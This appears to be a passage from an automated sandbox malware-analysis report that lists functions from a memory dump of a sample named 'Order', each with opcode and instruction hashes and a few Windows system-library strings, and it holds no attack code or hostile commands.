                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 304771c5e256cabdc666a827c001688df6b96b7538684f53c6b0ab5ddbe85d1f
                                                                                                                                    • Instruction ID: 3067bbce087b589abfc1377a82300c94b30870b1ceaee3bd65c05b1f312eb75c
                                                                                                                                    • Opcode Fuzzy Hash: 304771c5e256cabdc666a827c001688df6b96b7538684f53c6b0ab5ddbe85d1f
                                                                                                                                    • Instruction Fuzzy Hash: FA90022130250403D640715C541C6068049E7E2301F55D015E0458554CD91A89565326
                                                                                                                                    Function 01982CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7c785581f12fd7429fb8142cbca86edf2c1020aec359d35507fd9f285c5c3f17
                                                                                                                                    • Instruction ID: 93f5d6aceea0bb1ff89ac5979a677a535db77512912dc15d32491d468e801c1e
                                                                                                                                    • Opcode Fuzzy Hash: 7c785581f12fd7429fb8142cbca86edf2c1020aec359d35507fd9f285c5c3f17
                                                                                                                                    • Instruction Fuzzy Hash: 9190023120250802D600759C540C646404997E1301F55D015A5068555EC66A89916235
                                                                                                                                    Function 01982CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 11a993caac701af5e63f7048958689c1e72c9bd6f5dea3bdf91c34cf520d5240
                                                                                                                                    • Instruction ID: b5f623617930c263f7806f982d2494613faaad15cea089765b15208676f337e3
                                                                                                                                    • Opcode Fuzzy Hash: 11a993caac701af5e63f7048958689c1e72c9bd6f5dea3bdf91c34cf520d5240
                                                                                                                                    • Instruction Fuzzy Hash: 0D90022160650802D640715C541C706405997D1201F55D015A0068554DC65E8B5567A5
                                                                                                                                    Function 01982CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: afb08cc5455f3bf5f7661182dd52bd09a8c7fd1c7c9fe7b8ab80cfd5ed57478b
                                                                                                                                    • Instruction ID: e9903794a9a480cb896340374a5dc7c194dadf1083ef84ccf4471578e959c331
                                                                                                                                    • Opcode Fuzzy Hash: afb08cc5455f3bf5f7661182dd52bd09a8c7fd1c7c9fe7b8ab80cfd5ed57478b
                                                                                                                                    • Instruction Fuzzy Hash: 5690023120250803D600715C550C707404997D1201F55D415A0468558DD65B89516225
                                                                                                                                    Function 01982C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8500e2feb4f18526b734164136c5ee95a16bf6d5d44034bf3c0190f9580bfeae
                                                                                                                                    • Instruction ID: 08d960f7ac365a818951149621c77d15453d3692c835dcf1a7ab7d4c520b887a
                                                                                                                                    • Opcode Fuzzy Hash: 8500e2feb4f18526b734164136c5ee95a16bf6d5d44034bf3c0190f9580bfeae
                                                                                                                                    • Instruction Fuzzy Hash: 6990023120250C42D600715C4408B46404997E1301F55C01AA0168654DC61AC9517625
                                                                                                                                    Function 01982F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c372fee35af2ccd65f3d0fb328e2ec5f874b99fa85adf9e470268617f8bbc970
                                                                                                                                    • Instruction ID: 008c5f01bbfbb33a4df3e95c4e5683b95f9e544f545744f63d24427533edbfea
                                                                                                                                    • Opcode Fuzzy Hash: c372fee35af2ccd65f3d0fb328e2ec5f874b99fa85adf9e470268617f8bbc970
                                                                                                                                    • Instruction Fuzzy Hash: 9B90023120290802D600715C481870B404997D1302F55C015A11A8555DC62A89516675
                                                                                                                                    Function 01982FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8636f520a54791ee73c4a40baf2075f01ab8adb761dfb4940a6eef6badf36da7
                                                                                                                                    • Instruction ID: c68ca02023b61e0d1b4f1d18de9bf36804055bb76274ba00699a1a86842fa205
                                                                                                                                    • Opcode Fuzzy Hash: 8636f520a54791ee73c4a40baf2075f01ab8adb761dfb4940a6eef6badf36da7
                                                                                                                                    • Instruction Fuzzy Hash: 19900221602504424640716C88489068049BBE2211755C125A09DC550DC55E89655769
                                                                                                                                    Function 01982FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 027af7b843b52d92152b4b210eef3ddbdc50c95c5ed8269ed6fbbc1bfd342f9f
                                                                                                                                    • Instruction ID: e890f903d4b607e7d49825edff591b58f1bc00d5449cae06ba5184fa47a9af10
                                                                                                                                    • Opcode Fuzzy Hash: 027af7b843b52d92152b4b210eef3ddbdc50c95c5ed8269ed6fbbc1bfd342f9f
                                                                                                                                    • Instruction Fuzzy Hash: 6190023120290802D600715C480C747404997D1302F55C015A51A8555EC66AC9916635
                                                                                                                                    Function 01982FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9dd0a27983a86130cd47536b795e0a2ac00ad1c4adb5ec9ae2e320c8d59c60d4
                                                                                                                                    • Instruction ID: 2f61f581e35051fd9a90e234fdef191266dcb4e28edd6d83bad6f492bfc956cb
                                                                                                                                    • Opcode Fuzzy Hash: 9dd0a27983a86130cd47536b795e0a2ac00ad1c4adb5ec9ae2e320c8d59c60d4
                                                                                                                                    • Instruction Fuzzy Hash: F6900221212D0442D700756C4C18B07404997D1303F55C119A0198554CC91A89615625
                                                                                                                                    Function 01982F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9c574972f68f37948f2cc0ca12d619d223d9997ef6cc17a50e1b78ad3de013e8
                                                                                                                                    • Instruction ID: 9bc044dd39fa6b5999f90547b991fd07408f4ee099c011c45441289514f60d16
                                                                                                                                    • Opcode Fuzzy Hash: 9c574972f68f37948f2cc0ca12d619d223d9997ef6cc17a50e1b78ad3de013e8
                                                                                                                                    • Instruction Fuzzy Hash: EE90026134250842D600715C4418B064049D7E2301F55C019E10A8554DC61ECD52622A
                                                                                                                                    Function 01982F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 640a48c9910c74a430f2bfbad92b2ebaefc4fefb4b82e6cdf1d64e296a8218f2
                                                                                                                                    • Instruction ID: 678ec15efd0fe428a1bf19fe8f89cc460a6b9a936cb4dca33afc8a346bfb8a0c
                                                                                                                                    • Opcode Fuzzy Hash: 640a48c9910c74a430f2bfbad92b2ebaefc4fefb4b82e6cdf1d64e296a8218f2
                                                                                                                                    • Instruction Fuzzy Hash: F490026121250442D604715C4408706408997E2201F55C016A2198554CC52E8D615229
                                                                                                                                    Function 01982E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9bee59e6a14efba33c6594ff4c859080ebc56f0218d4edc77c9d36f1d9ee3de9
                                                                                                                                    • Instruction ID: 3c6c38a2ad735bc68576ce30af4bdf09efd06217e143e984e4c6dac3cae28ddd
                                                                                                                                    • Opcode Fuzzy Hash: 9bee59e6a14efba33c6594ff4c859080ebc56f0218d4edc77c9d36f1d9ee3de9
                                                                                                                                    • Instruction Fuzzy Hash: A890022160250902D601715C4408616404E97D1241F95C026A1068555ECA2A8A92A235
                                                                                                                                    Function 01982EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a2ed54bda7ad3036af9b7dd3a905d2dc029a7e8291b9150a1af1fdc57520187e
                                                                                                                                    • Instruction ID: 60674abf1b9a36a5d4855f5019013d04af9acda2b6c803c33c36bfdcce84870d
                                                                                                                                    • Opcode Fuzzy Hash: a2ed54bda7ad3036af9b7dd3a905d2dc029a7e8291b9150a1af1fdc57520187e
                                                                                                                                    • Instruction Fuzzy Hash: 4E90027120250802D640715C4408746404997D1301F55C015A50A8554EC65E8ED56769
                                                                                                                                    Function 01982EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cd9c3ac54b7e8debbda896d21ea7c8c5aa3588a7e39ecf87a38c298ab2e104be
                                                                                                                                    • Instruction ID: 89dc8afa898a7d7a9c4117e99b9a9157db9290c8a814b727e0e409dcb19e3ad9
                                                                                                                                    • Opcode Fuzzy Hash: cd9c3ac54b7e8debbda896d21ea7c8c5aa3588a7e39ecf87a38c298ab2e104be
                                                                                                                                    • Instruction Fuzzy Hash: 6D90026120290803D640755C4808607404997D1302F55C015A20A8555ECA2E8D516239
                                                                                                                                    Function 01982E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d33b116caec23ef52018c3b63203c760e4c01ccea5a51dcde48a99424eba862b
                                                                                                                                    • Instruction ID: 7d4aa8072f8991027eb19367de1b94265cfb7171595446c6ca9537d4e3897c01
                                                                                                                                    • Opcode Fuzzy Hash: d33b116caec23ef52018c3b63203c760e4c01ccea5a51dcde48a99424eba862b
                                                                                                                                    • Instruction Fuzzy Hash: 1390022130250802D602715C4418606404DD7D2345F95C016E1468555DC62A8A53A236
                                                                                                                                    Function 01983090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e6308cebcc6b9992b91eb5660421cb02637a2daf5b5db241aac93d7bf8eec07a
                                                                                                                                    • Instruction ID: 404ee5d7bfb28afae1f515282ec67c55da9306a52ae85912293b97c2356f1636
                                                                                                                                    • Opcode Fuzzy Hash: e6308cebcc6b9992b91eb5660421cb02637a2daf5b5db241aac93d7bf8eec07a
                                                                                                                                    • Instruction Fuzzy Hash: 3490022124250C02D640715C8418707404AD7D1601F55C015A0068554DC61B8A6567B5
                                                                                                                                    Function 01983010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8b3b2471d02ad810f10b33d3ce0dea29d1d5f9c81f5bceb0606fd2c79225ac03
                                                                                                                                    • Instruction ID: e94fa8547aa8d8f08af2ddd6542439c5f4e2006ff09a683e7ff62dff8785f56d
                                                                                                                                    • Opcode Fuzzy Hash: 8b3b2471d02ad810f10b33d3ce0dea29d1d5f9c81f5bceb0606fd2c79225ac03
                                                                                                                                    • Instruction Fuzzy Hash: F790022120294842D640725C4808B0F814997E2202F95C01DA419A554CC91A89555725
                                                                                                                                    Function 019839B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 115e87ef8a22753ddf0204e63fd66d62fd4ac006795c915f651651ebe92909d0
                                                                                                                                    • Instruction ID: 178454be628e69beb4db45428f73ee3f94ab0c5cb45cf3098d55223adf341a87
                                                                                                                                    • Opcode Fuzzy Hash: 115e87ef8a22753ddf0204e63fd66d62fd4ac006795c915f651651ebe92909d0
                                                                                                                                    • Instruction Fuzzy Hash: 7C90022124655502D650715C44086168049B7E1201F55C025A0858594DC55A89556325
                                                                                                                                    Function 01983D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2ef60cc94c2bf41323400bd2fd445598e074cc4fb917c84344ea61e490401721
                                                                                                                                    • Instruction ID: 0ea4412de5017c651c59a66909f20a1b42b865173f0a2a71bb02fc852feeb4a8
                                                                                                                                    • Opcode Fuzzy Hash: 2ef60cc94c2bf41323400bd2fd445598e074cc4fb917c84344ea61e490401721
                                                                                                                                    • Instruction Fuzzy Hash: 02900231203505429A40725C5808A4E814997E2302B95D419A0059554CC91989615325
                                                                                                                                    Function 01983D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5b80c6a1509e88832c5898ca82ffdd8bcf71ae9badf3c83b8403b8dfb47c2d01
                                                                                                                                    • Instruction ID: f769d972d6dbd4f0219a4a09b437c9211457dec019ddee9a7a6027b6b2f50d5f
                                                                                                                                    • Opcode Fuzzy Hash: 5b80c6a1509e88832c5898ca82ffdd8bcf71ae9badf3c83b8403b8dfb47c2d01
                                                                                                                                    • Instruction Fuzzy Hash: 4C90023520250802DA10715C5808646408A97D1301F55D415A0468558DC65989A1A225
                                                                                                                                    Function 01982C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                    • Instruction ID: c26a46f40155d0af60f41735fc008435baf0626200742d2b07df4f600b439870
                                                                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Function 01982890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                    • Opcode ID: b8905a6b86698fa9d1a5f658e03e25706355d167ec257ff177edf528c8e43843
                                                                                                                                    • Instruction ID: 390d1a32aab457465cdb5ae54ecb711d8e1bf31f59bb65c8478bce4d04e9a6b4
                                                                                                                                    • Opcode Fuzzy Hash: b8905a6b86698fa9d1a5f658e03e25706355d167ec257ff177edf528c8e43843
                                                                                                                                    • Instruction Fuzzy Hash: BA51E6B2A00116BFDF11EF9D898097EFBBCBB492417148229E46DD7641D374DE50C7A0
                                                                                                                                    Function 019F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                    • Opcode ID: ab05092538fb9f4825adad3969982f3a25b8cbd642c0ab672d95c800443dc9be
                                                                                                                                    • Instruction ID: 555dbddcc55781c2a2806daa82d5c0ac47ce8434ca06aaff7b9179cf276e9c9a
                                                                                                                                    • Opcode Fuzzy Hash: ab05092538fb9f4825adad3969982f3a25b8cbd642c0ab672d95c800443dc9be
                                                                                                                                    • Instruction Fuzzy Hash: 60510875A04645BFCB30DF9DC890A7FBBFCEB84201B04885DE69EC7641D6B4DA408760
                                                                                                                                    Function 01977630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 019B4655
                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 019B4725
                                                                                                                                    • Execute=1, xrefs: 019B4713
                                                                                                                                    • ExecuteOptions, xrefs: 019B46A0
                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019B46FC
                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 019B4742
                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 019B4787
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                    • API String ID: 0-484625025
                                                                                                                                    • Opcode ID: 67e4b62eb891f40f15d4b78c02bdd4747570e9d25e0a48832f0fa75a634fd821
                                                                                                                                    • Instruction ID: 678da6a5d91050a58fdad9f718e64edb17abdaa8d98dd56f23585a82f30275d3
                                                                                                                                    • Opcode Fuzzy Hash: 67e4b62eb891f40f15d4b78c02bdd4747570e9d25e0a48832f0fa75a634fd821
                                                                                                                                    • Instruction Fuzzy Hash: D2514A31A0021ABAEF15EBE8DC89FE977ADEF54700F0404A9E60DA7181E771AA41CF51
                                                                                                                                    Function 01A16940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                    • Instruction ID: 2b60ea38d8d5cd75749d68889903c71291bd8688a6fa69eb295e60b023c5524e
                                                                                                                                    • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                    • Instruction Fuzzy Hash: EB020571508342AFD305DF28C590A6BBBF5FFC8710F448A2DB9898B268DB71E945CB52
                                                                                                                                    Function 0198B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-$0$0
                                                                                                                                    • API String ID: 1302938615-699404926
                                                                                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction ID: e28631a731677418fd59a607b61958cdba4464bee8b80712f67dada553acef22
                                                                                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction Fuzzy Hash: 8D81E130E1124A8EEF25BE6CC850BFEBFB9AF45321F1C4519D86BA7691C7349840CB51
                                                                                                                                    Function 019F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: %%%u$[$]:%u
                                                                                                                                    • API String ID: 48624451-2819853543
                                                                                                                                    • Opcode ID: 03001704eb11f1a234e18842bfecde862564183c72e5a0465cedc8c3e1972c84
                                                                                                                                    • Instruction ID: 52c091a87252181e2fd5cb249b20f67aad219eb6599134a9382153af957730a2
                                                                                                                                    • Opcode Fuzzy Hash: 03001704eb11f1a234e18842bfecde862564183c72e5a0465cedc8c3e1972c84
                                                                                                                                    • Instruction Fuzzy Hash: E621337AE10119ABDB11DF69DC40AEE7BEDAF94654F44011AEA19D3240E730DA018BA5
